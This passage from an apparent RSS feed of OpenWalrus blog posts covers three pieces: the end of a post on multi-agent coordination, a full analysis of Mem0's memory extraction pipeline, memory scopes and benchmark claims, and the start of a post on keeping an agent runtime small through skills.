&lt;p&gt;&lt;strong&gt;Explicit handoff contracts.&lt;/strong&gt; The orchestrator maintains state; workers are stateless&lt;br&gt;
and only know what the orchestrator tells them per-invocation. This is the "Main Agent&lt;br&gt;
as Project Manager" pattern formalized. It's more overhead to design but dramatically&lt;br&gt;
reduces inter-agent confusion.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Budget meters and permission gates.&lt;/strong&gt; Catching runaway token consumption before it&lt;br&gt;
becomes a $90,000 surprise requires active monitoring. Permission gates before&lt;br&gt;
destructive or expensive operations give the system a chance to pause.&lt;/p&gt;
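&lt;p&gt;A budget meter can be as small as a counter that every LLM call passes through. A sketch, with an illustrative limit rather than any product's default:&lt;/p&gt;

```python
class BudgetMeter:
    """Stop a runaway workflow before it becomes an invoice surprise:
    charge every call against a fixed token budget."""
    def __init__(self, max_tokens: int):
        self.max_tokens = max_tokens
        self.used = 0

    def charge(self, tokens: int) -> bool:
        """Record usage; return False once the budget is exhausted,
        signaling the orchestrator to pause for approval."""
        self.used += tokens
        return not self.used > self.max_tokens
```

&lt;p&gt;The orchestrator checks the return value before dispatching the next agent, turning a silent cost explosion into an explicit pause point.&lt;/p&gt;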

&lt;p&gt;&lt;strong&gt;Observable task state.&lt;/strong&gt; When agents can report their current status to a shared&lt;br&gt;
registry — not just to their own context — the orchestrator and user can see what's&lt;br&gt;
happening and intervene. This is the problem the&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/agent-task-registry" rel="noopener noreferrer"&gt;task registry design&lt;/a&gt; addresses.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Checkpointing over re-discovery.&lt;/strong&gt; Explicit handoff documents (a structured summary&lt;br&gt;
of what's been done, what constraints apply, what decisions have been made) reduce&lt;br&gt;
context amnesia. The cost of writing a handoff document is cheaper than the cost of&lt;br&gt;
a subagent re-exploring the same territory.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://cognition.ai/blog/dont-build-multi-agents" rel="noopener noreferrer"&gt;Don't Build Multi-Agents&lt;/a&gt;
— Cognition's case for single-agent architecture&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.blog/ai-and-ml/generative-ai/multi-agent-workflows-often-fail-heres-how-to-engineer-ones-that-dont/" rel="noopener noreferrer"&gt;Multi-agent workflows often fail. Here's how to engineer ones that don't.&lt;/a&gt;
— GitHub Blog's structural analysis&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://towardsdatascience.com/why-your-multi-agent-system-is-failing-escaping-the-17x-error-trap-of-the-bag-of-agents/" rel="noopener noreferrer"&gt;Why Your Multi-Agent System is Failing: Escaping the 17x Error Trap&lt;/a&gt;
— cascading decision error analysis&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://medium.com/@ilyas.ibrahim/how-i-made-claude-code-agents-coordinate-100-and-solved-context-amnesia-5938890ea825" rel="noopener noreferrer"&gt;How I Solved Context Amnesia in Claude Code&lt;/a&gt;
— community workaround for context continuity&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/agent-task-registry" rel="noopener noreferrer"&gt;Seeing what your agents are doing: the task registry problem&lt;/a&gt;
— how walrus addresses observable task state&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;Plans vs tasks: how AI agents think before they act&lt;/a&gt;
— the planning side of multi-agent coordination&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/multi-agent-coordination" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Mem0: what three memory scopes actually cost</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:52:16 +0000</pubDate>
      <link>https://forem.com/crabtalk/mem0-what-three-memory-scopes-actually-cost-1kpc</link>
      <guid>https://forem.com/crabtalk/mem0-what-three-memory-scopes-actually-cost-1kpc</guid>
      <description>&lt;p&gt;Every agent memory system eventually faces the same question: when should the agent forget? &lt;a href="https://github.com/mem0ai/mem0" rel="noopener noreferrer"&gt;Mem0&lt;/a&gt;'s answer is to never let it come to that — an LLM-powered extraction pipeline watches every conversation, pulls out candidate memories, deduplicates them against a vector store, and asks a second LLM to decide whether each one should be added, updated, deleted, or ignored. It's the most sophisticated memory management pipeline we've examined. It's also the most expensive.&lt;/p&gt;

&lt;p&gt;We dug into how Mem0 actually works: the extraction pipeline, the three memory scopes, the benchmark claims, and the infrastructure required to run it. Here's what we found.&lt;/p&gt;

&lt;h2&gt;
  
  
  The extraction pipeline
&lt;/h2&gt;

&lt;p&gt;Most agent memory systems store what the agent explicitly asks to store. Mem0 takes a different approach: it watches every conversation and automatically extracts memories the agent never asked for.&lt;/p&gt;

&lt;h3&gt;
  
  
  How memories get created
&lt;/h3&gt;

&lt;p&gt;Three inputs feed the extraction pipeline:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Latest exchange&lt;/strong&gt; — the most recent user message and agent response&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rolling summary&lt;/strong&gt; — a compressed summary of recent conversation context&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Recent messages&lt;/strong&gt; — the last &lt;em&gt;m&lt;/em&gt; messages for continuity&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;An LLM processes these inputs and extracts candidate memories — concise facts, not full text. "User prefers TypeScript" rather than the full conversation where they mentioned it.&lt;/p&gt;
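&lt;p&gt;A minimal sketch of how those three inputs might be assembled into a single extraction prompt. The function and prompt wording are illustrative, not Mem0's actual API:&lt;/p&gt;

```python
# Illustrative sketch of Mem0-style extraction inputs. The function name
# and prompt text are hypothetical, not Mem0's real implementation.
def build_extraction_prompt(latest_exchange, rolling_summary, recent_messages):
    """Assemble the three inputs the extraction LLM sees."""
    context = "\n".join(recent_messages[-10:])  # last m messages for continuity
    return (
        f"Summary so far: {rolling_summary}\n"
        f"Recent context:\n{context}\n"
        f"Latest exchange:\n{latest_exchange}\n"
        "Extract concise candidate memories (facts, not transcripts)."
    )

prompt = build_extraction_prompt(
    latest_exchange="User: I prefer TypeScript. Agent: Noted.",
    rolling_summary="User is setting up a new web project.",
    recent_messages=["User: Starting a frontend rewrite."],
)
print(prompt.splitlines()[0])  # prints "Summary so far: User is setting up a new web project."
```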

&lt;h3&gt;
  
  
  The four-way LLM decision
&lt;/h3&gt;

&lt;p&gt;For each candidate memory, a second LLM call runs:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Vector similarity search&lt;/strong&gt; retrieves existing memories similar to the candidate&lt;/li&gt;
&lt;li&gt;The LLM sees the candidate and its nearest neighbors and decides one of four actions:

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ADD&lt;/strong&gt; — genuinely new information, store it&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;UPDATE&lt;/strong&gt; — augment an existing memory with more recent or detailed info&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DELETE&lt;/strong&gt; — the new information contradicts an existing memory, remove the old one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NOOP&lt;/strong&gt; — the fact already exists or is irrelevant, skip it&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This is where the cost lives. Every memory write requires two LLM calls (extract + decide), plus a vector similarity search. Over a 100-turn conversation, that's 200+ LLM calls just for memory management.&lt;/p&gt;
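&lt;p&gt;The write path can be sketched as a dispatch over the four actions. In the real system the judge is an LLM call; here a stub classifier stands in to show the control flow:&lt;/p&gt;

```python
# Minimal sketch of the four-way memory decision (ADD/UPDATE/DELETE/NOOP).
# Mem0 asks an LLM to judge; the lambda below is a stand-in for that call.
def decide(candidate, neighbors, judge):
    """Return one of ADD, UPDATE, DELETE, NOOP plus an optional target memory."""
    if not neighbors:
        return "ADD", None          # nothing similar exists yet
    return judge(candidate, neighbors)  # LLM call in the real system

def apply(store, candidate, action, target):
    if action == "ADD":
        store.append(candidate)
    elif action == "UPDATE":
        store[store.index(target)] = candidate
    elif action == "DELETE":
        store.remove(target)        # contradicted memory is dropped
    # NOOP: leave the store untouched

store = ["user prefers JavaScript"]
# Stub judge: the new fact supersedes the old preference.
action, target = decide("user prefers TypeScript", store,
                        judge=lambda c, ns: ("UPDATE", ns[0]))
apply(store, "user prefers TypeScript", action, target)
print(store)  # prints ['user prefers TypeScript']
```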

&lt;h3&gt;
  
  
  Graph-based conflict resolution
&lt;/h3&gt;

&lt;p&gt;Mem0's graph variant (Mem0ᵍ) adds a layer on top: a Conflict Detector that flags overlapping or contradictory nodes and edges, and an Update Resolver that determines merges, invalidations, or skips. This supports temporal reasoning — marking relationships as obsolete without deleting them.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The pipeline is technically impressive. The question is whether the overhead is worth it for most agent use cases.&lt;/p&gt;

&lt;h2&gt;
  
  
  Three memory scopes
&lt;/h2&gt;

&lt;p&gt;Mem0 organizes memory into three scopes that map to different temporal horizons.&lt;/p&gt;

&lt;h3&gt;
  
  
  Conversation memory (short-term)
&lt;/h3&gt;

&lt;p&gt;In-flight messages within a single turn. What was just said. This is what every agent framework has — the context window itself.&lt;/p&gt;

&lt;h3&gt;
  
  
  Session memory
&lt;/h3&gt;

&lt;p&gt;Short-lived context within a single task or channel. Tool outputs, intermediate calculations, what the agent is currently focused on. Dies when the session ends.&lt;/p&gt;

&lt;h3&gt;
  
  
  User memory (long-term)
&lt;/h3&gt;

&lt;p&gt;Persists across all conversations with a specific user. This is the most interesting scope — it contains:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Factual memory&lt;/strong&gt;: preferences, account details, domain knowledge&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Episodic memory&lt;/strong&gt;: summaries of past interactions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Semantic memory&lt;/strong&gt;: relationships between concepts for reasoning&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The system stores each scope separately and merges them during query. The search pipeline pulls from all scopes, ranking user memories first, then session notes, then raw history.&lt;/p&gt;
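&lt;p&gt;The merge-at-query behavior might look something like this, with per-scope results ranked by scope priority first and similarity second (the ranking scheme here is a toy reconstruction, not Mem0's code):&lt;/p&gt;

```python
# Sketch of merge-at-query across the three scopes: user memories rank
# first, then session notes, then raw history. Names are illustrative.
SCOPE_RANK = {"user": 0, "session": 1, "conversation": 2}

def search(query, memories, limit=3):
    """memories: list of (scope, text, score) from per-scope vector searches."""
    hits = [m for m in memories if query.lower() in m[1].lower()]
    # Sort by scope priority first, similarity score second (descending).
    hits.sort(key=lambda m: (SCOPE_RANK[m[0]], -m[2]))
    return [text for _, text, _ in hits][:limit]

memories = [
    ("conversation", "typescript question asked just now", 0.9),
    ("session", "current task: typescript migration", 0.8),
    ("user", "user prefers typescript", 0.7),
]
print(search("typescript", memories))  # user memory surfaces first despite its lower score
```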

&lt;p&gt;&lt;strong&gt;The scope assignment problem&lt;/strong&gt;: when the extraction pipeline identifies a new memory, which scope does it belong to? "User prefers TypeScript" is clearly user-scoped. "The current deployment is failing" is session-scoped. But "user is working on a migration to Rust" sits in a gray zone — it's user-level context, but it's temporary. Misclassification in either direction causes problems: user-scoped memories that should be session-scoped pollute all future sessions; session-scoped memories that should be user-scoped disappear when the session ends.&lt;/p&gt;

&lt;h2&gt;
  
  
  The benchmark claims
&lt;/h2&gt;

&lt;p&gt;Mem0's &lt;a href="https://arxiv.org/abs/2504.19413" rel="noopener noreferrer"&gt;research paper&lt;/a&gt; (Chhikara et al., April 2025) reports strong numbers.&lt;/p&gt;

&lt;h3&gt;
  
  
  LOCOMO results
&lt;/h3&gt;

&lt;p&gt;On the LOCOMO (Long Conversational Memory) benchmark, Mem0 scores 66.9% on an LLM-as-Judge evaluation, compared to 52.9% for OpenAI's memory. The graph variant (Mem0ᵍ) adds roughly 2% on top.&lt;/p&gt;

&lt;h3&gt;
  
  
  Token savings and latency
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Mem0 claim&lt;/th&gt;
&lt;th&gt;Baseline&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Token savings&lt;/td&gt;
&lt;td&gt;90% reduction&lt;/td&gt;
&lt;td&gt;Full-context (26K → 1.8K tokens)&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Latency (P95)&lt;/td&gt;
&lt;td&gt;91% reduction&lt;/td&gt;
&lt;td&gt;Full-context (17.12s → 1.44s)&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Accuracy&lt;/td&gt;
&lt;td&gt;26% relative improvement&lt;/td&gt;
&lt;td&gt;LLM-as-Judge vs OpenAI memory&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LOCOMO (LLM-as-Judge)&lt;/td&gt;
&lt;td&gt;66.9%&lt;/td&gt;
&lt;td&gt;OpenAI memory (52.9%)&lt;/td&gt;
&lt;td&gt;arXiv:2504.19413&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  What the paper actually measures
&lt;/h3&gt;

&lt;p&gt;The 90% token savings compares selective memory retrieval (pull only relevant memories) against stuffing the full conversation history into the context window. This is a real comparison, but the baseline is generous — few production systems stuff raw history without any summarization. Against a properly compacted conversation, the savings would be smaller.&lt;/p&gt;

&lt;p&gt;The paper doesn't report the total cost including the extraction pipeline itself. The 90% savings is on the retrieval side only. If the extraction pipeline adds 200 LLM calls over a 100-turn conversation, the total cost equation changes significantly.&lt;/p&gt;

&lt;p&gt;The practical deployments the paper cites (RevisionDojo, OpenNote) report 40% token reduction — a more realistic figure that likely includes extraction overhead.&lt;/p&gt;

&lt;h2&gt;
  
  
  Infrastructure requirements
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Self-hosted stack
&lt;/h3&gt;

&lt;p&gt;Running Mem0 yourself requires:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Docker &amp;amp; Docker Compose v2&lt;/strong&gt; — orchestration layer&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL + pgvector&lt;/strong&gt; — vector storage&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Neo4j&lt;/strong&gt; — graph database for relationship memory&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;OpenAI API key&lt;/strong&gt; — default LLM and embedding model (swappable for Ollama for fully local inference)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;That's four external services before you store a single memory. The documentation estimates 2-5 minutes for initial setup, but production deployment (persistence volumes, auth, CORS, monitoring) is significantly more involved. The default configuration has no authentication or CORS restrictions — the docs explicitly warn about needing a reverse proxy before network exposure.&lt;/p&gt;

&lt;h3&gt;
  
  
  Managed service
&lt;/h3&gt;

&lt;p&gt;Mem0's managed service at app.mem0.ai reduces this to a single API key. It is SOC 2 compliant, with audit logs and workspace governance. This is where the infrastructure complexity disappears — but the LLM extraction cost remains.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  How it compares
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Mem0&lt;/th&gt;
&lt;th&gt;Walrus&lt;/th&gt;
&lt;th&gt;Graphiti (Zep)&lt;/th&gt;
&lt;th&gt;Claude Code&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Memory scopes&lt;/td&gt;
&lt;td&gt;3 (conversation, session, user)&lt;/td&gt;
&lt;td&gt;1 (unified graph)&lt;/td&gt;
&lt;td&gt;1 (temporal KG)&lt;/td&gt;
&lt;td&gt;1 (files on disk)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Storage backend&lt;/td&gt;
&lt;td&gt;24+ vector stores + Neo4j&lt;/td&gt;
&lt;td&gt;LanceDB + lance-graph&lt;/td&gt;
&lt;td&gt;Neo4j&lt;/td&gt;
&lt;td&gt;Markdown files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Extraction&lt;/td&gt;
&lt;td&gt;LLM pipeline (extract + decide)&lt;/td&gt;
&lt;td&gt;Agent tools (remember/recall)&lt;/td&gt;
&lt;td&gt;LLM + temporal edges&lt;/td&gt;
&lt;td&gt;Manual / auto-memory&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Conflict resolution&lt;/td&gt;
&lt;td&gt;Graph Conflict Detector + Update Resolver&lt;/td&gt;
&lt;td&gt;Upsert (last write wins)&lt;/td&gt;
&lt;td&gt;Bi-temporal invalidation&lt;/td&gt;
&lt;td&gt;Manual edit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;External dependencies&lt;/td&gt;
&lt;td&gt;PostgreSQL, Neo4j, vector DB, OpenAI&lt;/td&gt;
&lt;td&gt;None (embedded)&lt;/td&gt;
&lt;td&gt;Neo4j server&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LLM calls per write&lt;/td&gt;
&lt;td&gt;2 (extract + decide)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;td&gt;1 (extraction)&lt;/td&gt;
&lt;td&gt;0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment&lt;/td&gt;
&lt;td&gt;Docker Compose or managed cloud&lt;/td&gt;
&lt;td&gt;Single binary&lt;/td&gt;
&lt;td&gt;Docker + Neo4j&lt;/td&gt;
&lt;td&gt;CLI / IDE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;License&lt;/td&gt;
&lt;td&gt;Apache 2.0&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;td&gt;MIT&lt;/td&gt;
&lt;td&gt;Proprietary&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;



&lt;p&gt;The radar chart in the original post shows the core tradeoff: Mem0 dominates on deduplication and conflict resolution. Walrus dominates on setup simplicity and schema flexibility. Neither wins everywhere — they're optimizing for different constraints.&lt;/p&gt;

&lt;h2&gt;
  
  
  What walrus does differently
&lt;/h2&gt;

&lt;p&gt;Walrus bets on a single memory layer: LanceDB + lance-graph with three tables (entities, relations, journals) and six tools (remember, recall, relate, connections, compact, distill). No extraction pipeline, no scope disambiguation, no LLM calls per write.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The write path tells the story. Mem0 adds four steps between "something worth remembering happened" and "memory stored." Walrus has one: the agent calls &lt;code&gt;remember&lt;/code&gt; and the fact goes into the graph.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where this works&lt;/strong&gt;: for agents that run tens to hundreds of sessions, the agent itself can manage deduplication through careful key naming and &lt;code&gt;recall&lt;/code&gt; before &lt;code&gt;remember&lt;/code&gt;. The LLM is already reasoning about the conversation — asking it to also decide what's worth storing is a smaller cognitive burden than running a separate extraction pipeline.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Where this breaks&lt;/strong&gt;: at thousands of sessions with the same user, manual deduplication stops scaling. If the agent uses different keys for the same concept across sessions, duplicates accumulate. Mem0's similarity-threshold deduplication (0.85 cosine similarity triggers a semantic merge) catches these automatically. Walrus doesn't — yet.&lt;/p&gt;
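&lt;p&gt;The threshold-based merge is straightforward to sketch. The vectors and storage layout below are toy stand-ins; only the 0.85 cosine threshold comes from the text above:&lt;/p&gt;

```python
# Sketch of automatic similarity-threshold dedup (Mem0 style): a write
# whose embedding is within 0.85 cosine similarity of an existing memory
# merges into it instead of creating a duplicate under a new key.
import math

def cosine(a, b):
    dot = sum(x * y for x, y in zip(a, b))
    na = math.sqrt(sum(x * x for x in a))
    nb = math.sqrt(sum(x * x for x in b))
    return dot / (na * nb)

def remember_with_dedup(store, key, text, vec, threshold=0.85):
    """Merge into an existing memory when similarity meets the threshold."""
    for existing_key, (_, evec) in store.items():
        if cosine(vec, evec) >= threshold:
            store[existing_key] = (text, vec)   # semantic merge, no duplicate
            return existing_key
    store[key] = (text, vec)                    # genuinely new memory
    return key

store = {"lang-pref": ("user prefers TS", [1.0, 0.1])}
# Near-duplicate written under a different key gets merged, not duplicated:
merged = remember_with_dedup(store, "language", "user prefers TypeScript", [0.98, 0.12])
print(merged, len(store))  # prints "lang-pref 1"
```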

&lt;p&gt;We explored these memory architecture tradeoffs across five products in &lt;a href="https://openwalrus.xyz/blog/persistent-agent-memory-research" rel="noopener noreferrer"&gt;persistent agent memory research&lt;/a&gt;. Hermes Agent takes yet another approach with &lt;a href="https://openwalrus.xyz/blog/hermes-agent-survey" rel="noopener noreferrer"&gt;five memory layers&lt;/a&gt; — procedural skills, user modeling via Honcho, and FTS5 for cross-session recall. The &lt;a href="https://openwalrus.xyz/blog/context-compaction" rel="noopener noreferrer"&gt;context compaction survey&lt;/a&gt; covers how frameworks handle the overflow problem that drives memory systems in the first place.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Does the extraction pipeline pay for itself?&lt;/strong&gt; Mem0 makes 2 LLM calls per memory write. At GPT-4o pricing, a 100-turn conversation costs roughly $0.30–0.80 just in memory management. The 90% token savings on retrieval are real — but do they offset the extraction cost? The paper reports savings on the retrieval side only, not total cost including extraction.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;What happens when the conflict resolver gets it wrong?&lt;/strong&gt; The graph-based Conflict Detector + Update Resolver is LLM-powered, which means probabilistic. If it incorrectly marks "prefers async/await in TypeScript" as conflicting with "prefers callbacks in Python" (different languages, different contexts), the user loses a valid memory. The paper reports aggregate accuracy but not conflict resolution precision.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Do most agents need three memory scopes?&lt;/strong&gt; Conversation, session, and user memory is a clean taxonomy. But scope assignment is itself an LLM decision — misclassification creates problems in both directions. For many agent use cases (coding assistants, chatbots, task automation), a single-layer approach with explicit agent control may be simpler and sufficient.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Can a single-layer approach match Mem0 at scale?&lt;/strong&gt; At 10,000 memories across 500 sessions, deduplication isn't optional — it's survival. Does walrus need to add dedup at the storage layer, or can smarter &lt;code&gt;recall&lt;/code&gt; + &lt;code&gt;remember&lt;/code&gt; patterns handle it?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Is the managed service the real product?&lt;/strong&gt; Self-hosted Mem0 requires Docker + PostgreSQL + Neo4j + OpenAI. The managed service requires an API key. The complexity gap between the two is enormous. The open-source version may be more lead generator than standalone product — a pattern increasingly common in AI infrastructure.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2504.19413" rel="noopener noreferrer"&gt;Mem0 research paper&lt;/a&gt; — Chhikara et al., "Building Production-Ready AI Agents with Scalable Long-Term Memory" (April 2025)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/mem0ai/mem0" rel="noopener noreferrer"&gt;Mem0 GitHub&lt;/a&gt; — Apache 2.0, 41K+ stars&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.mem0.ai/" rel="noopener noreferrer"&gt;Mem0 documentation&lt;/a&gt; — architecture overview, API reference, self-hosting guide&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.mem0.ai/open-source/features/graph-memory" rel="noopener noreferrer"&gt;Graph memory docs&lt;/a&gt; — Mem0ᵍ variant with Neo4j/Memgraph&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2306.07174" rel="noopener noreferrer"&gt;LOCOMO benchmark&lt;/a&gt; — Long Conversation Memory evaluation framework&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/getzep/graphiti" rel="noopener noreferrer"&gt;Graphiti (Zep)&lt;/a&gt; — temporal knowledge graph alternative&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/mem0-memory-architecture" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Less code, more skills</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:51:33 +0000</pubDate>
      <link>https://forem.com/crabtalk/less-code-more-skills-2kf5</link>
      <guid>https://forem.com/crabtalk/less-code-more-skills-2kf5</guid>
      <description>&lt;p&gt;OpenWalrus is a single binary. No Docker, no microservices, no plugin&lt;br&gt;
runtime with a package manager. One &lt;code&gt;cargo install&lt;/code&gt;, one process, and&lt;br&gt;
you have a fully autonomous AI agent runtime on your machine.&lt;/p&gt;

&lt;p&gt;Keeping it that way while scaling to every possible use case is the&lt;br&gt;
central design tension of the project. And it's the same tension every&lt;br&gt;
agent framework faces: &lt;strong&gt;how do you stay small without becoming limited?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Our answer is a design principle we keep coming back to: &lt;strong&gt;less code,&lt;br&gt;
more skills.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The framework bloat trap
&lt;/h2&gt;

&lt;p&gt;Agent frameworks grow fast. A team ships a coding agent. Users ask for&lt;br&gt;
web browsing, so they add a browser tool. Users ask for memory, so they&lt;br&gt;
add a memory subsystem. Users ask for RAG, so they bundle an embedding&lt;br&gt;
model. Users ask for customization, so they add configuration layers —&lt;br&gt;
CLAUDE.md, .cursorrules, AGENTS.md, TOOLS.md, MEMORY.md, memory banks,&lt;br&gt;
auto-generated observations, reflections, compressed histories.&lt;/p&gt;

&lt;p&gt;Every feature request answered with framework code makes the repo bigger,&lt;br&gt;
the binary heavier, the surface area wider, and the maintenance burden&lt;br&gt;
steeper. Eventually the framework is doing so much that it becomes the&lt;br&gt;
bottleneck — slow to build, hard to debug, impossible to audit.&lt;/p&gt;

&lt;p&gt;The system prompt suffers the same inflation. &lt;a href="https://arxiv.org/abs/2507.11538" rel="noopener noreferrer"&gt;Research shows&lt;/a&gt; frontier LLMs&lt;br&gt;
reliably follow around 150-200 instructions. Past that, adherence degrades&lt;br&gt;
— sometimes exponentially for smaller models. Every feature that injects&lt;br&gt;
more context into the prompt makes the agent worse at everything else.&lt;/p&gt;

&lt;p&gt;We've watched this happen. We hit the ceiling ourselves. And we stopped&lt;br&gt;
pushing through it.&lt;/p&gt;

&lt;h2&gt;
  
  
  The principle: small core, open surface
&lt;/h2&gt;

&lt;p&gt;The walrus repo should stay compact. Not because we're lazy, but because&lt;br&gt;
a compact core is a correct core — easier to audit, easier to trust,&lt;br&gt;
easier to run on constrained hardware.&lt;/p&gt;

&lt;p&gt;But a compact core only works if the surface area for extension is wide&lt;br&gt;
open. This is where skills come in.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The core&lt;/strong&gt; handles what only the core can handle: LLM inference, agent&lt;br&gt;
lifecycle, tool dispatch, and a&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/graph-vector-hybrid-memory" rel="noopener noreferrer"&gt;graph memory layer&lt;/a&gt; backed by&lt;br&gt;
&lt;a href="https://lancedb.com/" rel="noopener noreferrer"&gt;LanceDB&lt;/a&gt; + &lt;a href="https://github.com/lance-format/lance-graph" rel="noopener noreferrer"&gt;lance-graph&lt;/a&gt;.&lt;br&gt;
Both are embedded, Rust-native, and compile into the walrus binary — no&lt;br&gt;
separate database server, no Docker. This is the code we maintain.&lt;br&gt;
It should be small, correct, and boring.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Skills and MCP servers&lt;/strong&gt; handle everything else. A skill is a behavioral&lt;br&gt;
